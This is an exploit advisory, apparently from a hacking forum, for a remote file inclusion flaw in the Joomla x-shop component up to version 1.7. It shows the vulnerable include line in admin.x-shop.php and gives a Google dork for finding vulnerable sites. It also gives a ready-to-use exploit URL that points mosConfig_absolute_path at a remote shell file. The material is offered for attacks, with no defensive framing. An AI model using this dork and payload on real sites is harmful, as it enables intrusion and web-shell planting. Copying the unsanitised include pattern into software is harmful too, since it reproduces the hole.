Joomla x-shop <= 1.7 Remote File Include Vulnerability
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
--------------------------------------------------------------------------------
Title : Joomla x-shop <= 1.7 Remote File Include Vulnerability
--------------------------------------------------------------------------------
#Author: Crackers_Child
#cont@ct: crackers_child@xxxxxxxxxxxxxxxxxxx
--------------------------------------------------------------------------------
Google Dorks : allinurl:"/com_x-shop/"
-------------------------
-------------------------------------------------------
Download : http://mamboxchange.com/frs/?group_id=187&release_id=1047
--------------------------------------------------------------------------------
Bug in admin.x-shop.php
<?
include($mosConfig_absolute_path.'/administrator/components/com_x-shop/languages/'.$mosConfig_lang.'.php');
session_start();
--------------------------------------------------------------------------------
Exploit:
http://www.site.com/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=Shell.txt?
--------------------------------------------------------------------------------
greets:
All My Friends And SiberSavascilar.Com Members !
--------------------------------------------------------------------------------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ]
--------------------------------------